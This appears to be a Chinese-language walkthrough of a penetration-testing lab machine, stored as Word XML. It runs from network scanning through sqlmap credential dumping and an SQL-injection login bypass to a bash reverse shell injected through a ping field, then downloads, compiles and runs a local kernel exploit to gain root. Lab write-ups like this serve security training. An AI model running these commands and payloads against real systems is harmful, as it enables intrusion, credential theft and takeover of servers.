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netdiscover -i eth0 -r 192.168.194.0/24</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="378015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nmap -sV 192.168.194.160</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267960" cy="233807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055" cy="254508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抓包尝试爆破</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5264150" cy="3361690"/>
            <wp:effectExtent l="0" t="0" r="889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保存抓包文件进行爆破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Sqlmap注入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sqlmap -r </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>kio1.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">  --level 5 --risk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sqlmap -r </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>kio1.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">  --level 5 --risk 3 --dbs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sqlmap -r </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>kio1.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">  --level 5 --risk 3 -D webapp --tables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sqlmap -r </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>kio1.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">  --level 5 --risk 3 -D webapp -T users --columns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sqlmap -r </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>kio1.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">  --level 5 --risk 3 -D webapp -T users -C username,password --dump</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="3561080"/>
            <wp:effectExtent l="0" t="0" r="2540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存在注入点的是1处</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="3681730"/>
            <wp:effectExtent l="0" t="0" r="635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831590"/>
            <wp:effectExtent l="0" t="0" r="0" b="889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706495"/>
            <wp:effectExtent l="0" t="0" r="0" b="1206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841115"/>
            <wp:effectExtent l="0" t="0" r="14605" b="1460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admin    | 5afac8d85f |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| john     | 66lajGGbla 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或者万能密码尝试登录admin' OR 1=1/* 也可以的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登录后页面</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273675" cy="1713230"/>
            <wp:effectExtent l="0" t="0" r="14605" b="889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输入127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="2570480"/>
            <wp:effectExtent l="0" t="0" r="6350" b="508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考虑有命令执行漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273675" cy="3527425"/>
            <wp:effectExtent l="0" t="0" r="14605" b="825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114300" distR="114300">
            <wp:extent cx="5272405" cy="4748530"/>
            <wp:effectExtent l="0" t="0" r="635" b="635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Nc开启监听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nc -lvvp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4444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192.168.194.129&amp;&amp;bash -i &gt;&amp; /dev/tcp/192.168.194.129/4444 0&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269230" cy="4537710"/>
            <wp:effectExtent l="0" t="0" r="3810" b="381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页面一直加载不出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但是反弹shell成功</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5212080" cy="2971800"/>
            <wp:effectExtent l="0" t="0" r="0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仅为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</w:rPr>
        <w:t>apache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服务器权限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uname -a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cat /etc/redhat-release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zh-CN"/>
        </w:rPr>
        <w:t>lsb_release -a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="3571875"/>
            <wp:effectExtent l="0" t="0" r="1905" b="952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searchsploit linux 2.6 centos 4.5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查看漏洞库或者也可网上查找有无可利用漏洞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677795"/>
            <wp:effectExtent l="0" t="0" r="3810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69865" cy="3469640"/>
            <wp:effectExtent l="0" t="0" r="3175" b="508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下载exp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="1174115"/>
            <wp:effectExtent l="0" t="0" r="635" b="1460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查看脚本内容以及使用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="3723005"/>
            <wp:effectExtent l="0" t="0" r="4445" b="1079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http.server 80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临时开启http服务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56760" cy="51816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下载脚本编译利用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/tmp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wget http://192.168.194.129/9542.c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gcc 9542.c -o exp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./exp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whoami</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="3806825"/>
            <wp:effectExtent l="0" t="0" r="635" b="317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成功拿到root权限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</w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="012F41F1"/>
    <w:rsid w:val="02A22CA5"/>
    <w:rsid w:val="04272E41"/>
    <w:rsid w:val="04D969C6"/>
    <w:rsid w:val="09A03EDE"/>
    <w:rsid w:val="0C0F668B"/>
    <w:rsid w:val="0CC46135"/>
    <w:rsid w:val="0DF418E9"/>
    <w:rsid w:val="0EBA2E73"/>
    <w:rsid w:val="0F2227A9"/>
    <w:rsid w:val="117B17FC"/>
    <w:rsid w:val="12E14A8F"/>
    <w:rsid w:val="164A3B8E"/>
    <w:rsid w:val="1798507A"/>
    <w:rsid w:val="1A712403"/>
    <w:rsid w:val="1A8C5C99"/>
    <w:rsid w:val="1B105598"/>
    <w:rsid w:val="1F9B08C0"/>
    <w:rsid w:val="28B161BD"/>
    <w:rsid w:val="28DC43AF"/>
    <w:rsid w:val="2AC21060"/>
    <w:rsid w:val="2B161A0E"/>
    <w:rsid w:val="2BD333FD"/>
    <w:rsid w:val="2BD80E5D"/>
    <w:rsid w:val="2E376E42"/>
    <w:rsid w:val="314932FB"/>
    <w:rsid w:val="31F84007"/>
    <w:rsid w:val="32C510AF"/>
    <w:rsid w:val="32FA0C59"/>
    <w:rsid w:val="33997CFE"/>
    <w:rsid w:val="38D25C01"/>
    <w:rsid w:val="3D3E5D33"/>
    <w:rsid w:val="475C74D6"/>
    <w:rsid w:val="47D76015"/>
    <w:rsid w:val="4B985147"/>
    <w:rsid w:val="4D796F0D"/>
    <w:rsid w:val="52B400B8"/>
    <w:rsid w:val="55592415"/>
    <w:rsid w:val="599E6821"/>
    <w:rsid w:val="5AB7558E"/>
    <w:rsid w:val="5B4622EF"/>
    <w:rsid w:val="5CA940FC"/>
    <w:rsid w:val="5F131521"/>
    <w:rsid w:val="611B712C"/>
    <w:rsid w:val="61AE798F"/>
    <w:rsid w:val="61F51BF9"/>
    <w:rsid w:val="65F85430"/>
    <w:rsid w:val="66FF677D"/>
    <w:rsid w:val="68436F89"/>
    <w:rsid w:val="6A331379"/>
    <w:rsid w:val="6AFA3FDD"/>
    <w:rsid w:val="6C7C1180"/>
    <w:rsid w:val="6CA5747E"/>
    <w:rsid w:val="72541323"/>
    <w:rsid w:val="74B27425"/>
    <w:rsid w:val="79F66E03"/>
    <w:rsid w:val="7B3A03BD"/>
    <w:rsid w:val="7E8E4BE9"/>
    <w:rsid w:val="7FBC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248</Words>
  <Characters>747</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>302</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>845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2025-07-08T03:02:00Z</dcterms:created>
  <dc:creator>Annie</dc:creator>
  <cp:lastModifiedBy>穆意</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-07-08T08:30:52Z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8DB805D24F3B44D49B1B5020D4E2F738</vt:lpwstr>
  </property>
</Properties>
</file>